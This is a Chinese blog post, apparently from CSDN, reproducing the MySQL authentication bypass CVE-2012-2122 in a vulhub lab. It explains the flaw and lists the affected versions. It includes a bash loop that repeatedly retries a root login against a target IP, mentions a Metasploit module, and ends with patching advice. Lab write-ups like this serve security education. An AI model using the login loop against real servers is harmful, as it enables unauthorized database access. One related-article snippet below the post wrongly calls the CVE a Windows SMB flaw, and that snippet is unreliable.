Mysql CVE-2012-2122(vulhub)漏洞复现

最新推荐文章于 2024-06-12 13:24:19 发布
最新推荐文章于 2024-06-12 13:24:19 发布
阅读量314 收藏 2
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MDSEC/article/details/132453233
版权

1.漏洞简介


当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

2.受影响的版本


MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

3.漏洞复现

拉去镜像环境

 

 查看mysql版本,符合复现环境

 执行msfconsole

 run也可以用exploit替代

 执行下面的循环尝试破解

for i in `seq 1 1000`;do mysql -uroot -p123456 -h 192.168.182.131 -P3306;done

# -u 指定用户名
# -p 指定密码
# -h 指定ip
# -P 指定端口
# for i in `seq 1 1000` 循环1-1000次

 数据库默认账号:root,密码:123456

 

4.漏洞解决办法

   1、升级官方补丁

   2、更新mysql

如想了解hvv期间漏洞的poc可关注微信公众号:猫蛋儿安全

MDSEC
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1275
在一个虚拟机中操作。
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2310
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
c0529的博客
06-12 537
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入使用:kali+vulhub
mysql身份认证绕过漏洞复现CVE-2012-2122
weixin_53730939的博客
03-12 1381
mysql身份认证绕过漏洞复现CVE-2012-2122
vulhub靶场mysql类型CVE-2012-2122漏洞复现
qq_58873970的博客
07-24 594
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 2871
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
Mysql 身份认证绕过漏洞CVE-2012-2122复现
挚爱凝华的博客
04-13 1036
启用msf数据库 启用msfconsole,使用模块 设置靶机ip,设置线程,开始攻击(未成功) 漏洞原理:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较 由于不正确的处理会导致即便是memcmp()返回一个非零值 也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号 解决:升级官方补丁 更新mysql ...
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 1034
漏洞CVE 2012-2122复现——Mysql身份验证绕过
复现 CVE2012-2122漏洞 ,用两种攻击方式复现
weixin_64655821的博客
08-26 962
复现 CVE2012-2122漏洞 ,用两种攻击方式复现 复现mysql 备份上传木马,并用shell工具连接操作
复现goby——CVE-2012-2122Mysql 身份认证绕过)
记录并分享学习安全的知识点..
01-22 2102
一、漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。(只要知道用户名,不断尝试就能够直接登入SQL数据库。) 二、影响版本 All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable. MariaDB versions from .
vulhub复现MYSQL-cve-2012-2122-身份认证漏洞及利用
carrot11223的博客
12-23 467
mysql身份认证漏洞复现
Mysql身份认证绕过漏洞CVE-2012-2122复现
weixin_51641247的博客
03-13 155
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库
cve-2012-2122
最新发布
06-14
CVE-2012-2122是一个知名的计算机安全漏洞,它影响了Microsoft Windows操作系统中的远程代码执行功能。这个漏洞通常被称为“MS12-020”或“Windows SMBGhost”,漏洞存在于Server Message Block (SMB) 协议的某些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值